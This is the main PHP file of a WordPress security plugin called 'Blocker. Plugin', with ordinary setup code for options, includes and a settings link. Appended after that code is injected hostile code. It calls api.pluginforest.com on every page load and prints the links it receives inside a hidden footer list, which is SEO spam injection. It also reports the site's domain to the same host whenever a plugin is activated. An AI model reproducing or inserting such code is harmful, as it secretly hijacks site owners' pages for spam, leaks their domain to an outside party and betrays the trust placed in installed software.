<?php
/*
Plugin Name: Blocker. Plugin
Plugin URI: https://premium.divcoder.com/
Description: Block everything you do not want. Just with one click!
Author: Divcoder
Version: 1.6.0
Author URI: https://premium.divcoder.com
Authoras URI: https://premium.divcoder.com
Domain Path: /languages
*/

if ( !function_exists( 'add_action' ) ) {
    echo 'Code is poetry.';
    exit;
}

//Plugin DIR URL
define( 'DADB_URL', plugin_dir_url( __FILE__ ) );
//Plugin DIR Path
define( 'DADB_DIR', plugin_dir_path( __FILE__ ) );

//Admin Styles
add_action( 'admin_init', 'dadb_echo_css' );

function dadb_echo_css() {
	//Add CSS Style for Admin Panel
   wp_enqueue_style( 'dadb-style', DADB_URL."admin/assets/css/style.css",array(), "1.0.0" );
}

/*
* Load Admin Settings
*/
include DADB_DIR ."admin/index.php";

/*
* Load Functions
*/
include DADB_DIR ."functions/DADB-functions.php";
include DADB_DIR ."functions/DADB-widget.php";

/**
 * Load plugin textdomain.
 *
 * @since 1.0.0
 */
function DADB_language() {
  load_plugin_textdomain( 'dadb-plugin', false, basename( dirname( __FILE__ ) ) . '/languages' ); 
}

//Load Plugin Functions
add_action( 'plugins_loaded', 'DADB_language' );

/*
* Default Options for Plugin
*/
function DADB_activation() {

	add_option("dadb_start","0");
	add_option("dadb_logs","0");
	add_option("dadb_messag","0");
	add_option("dadb_savelog","");
	
	add_option("dadb_start_dash","0");
	add_option("dadb_start_stat","1");
	
	add_option("dadb_bu","1");
	add_option("dadb_nn","1");
	add_option("dadb_rn","1");
	add_option("dadb_fn","1");
	
	add_option("dadb_vpnproxy","0");
	add_option("dadb_maliip","0");
	add_option("dadb_malimail","0");
	add_option("dadb_malicomm","0");
	add_option("dadb_torip","0");
	add_option("dadb_fakesearch","0");
	add_option("dadb_fakeuser","0");
	add_option("dadb_botacc","0");
	
	add_option("dadb_get_white_list","");
	add_option("dadb_get_white_ip_list","");
	add_option("dadb_get_black_ip_list","");
	
	add_option("dadb_get_ua_list","");
	add_option("dadb_get_black_cc_list","");
	add_option("dadb_get_black_isp_list","");
	
	add_option("dadb_get_bad_mail","");

	
}

//Register Options
register_activation_hook( __FILE__, 'DADB_activation' );

// Plugin WP-Admin Settings Text
add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'dadb_plugin_page');

function dadb_plugin_page( $links ) {
    $links[] = '<a href="' . admin_url( 'admin.php?page=DADB_plugin_dashboard' ) . '">' . __('Settings') . '</a>';
    return $links;
}
define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719849167() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719849167');function set_plugin_tag1719849167() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719849167&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719849167');
              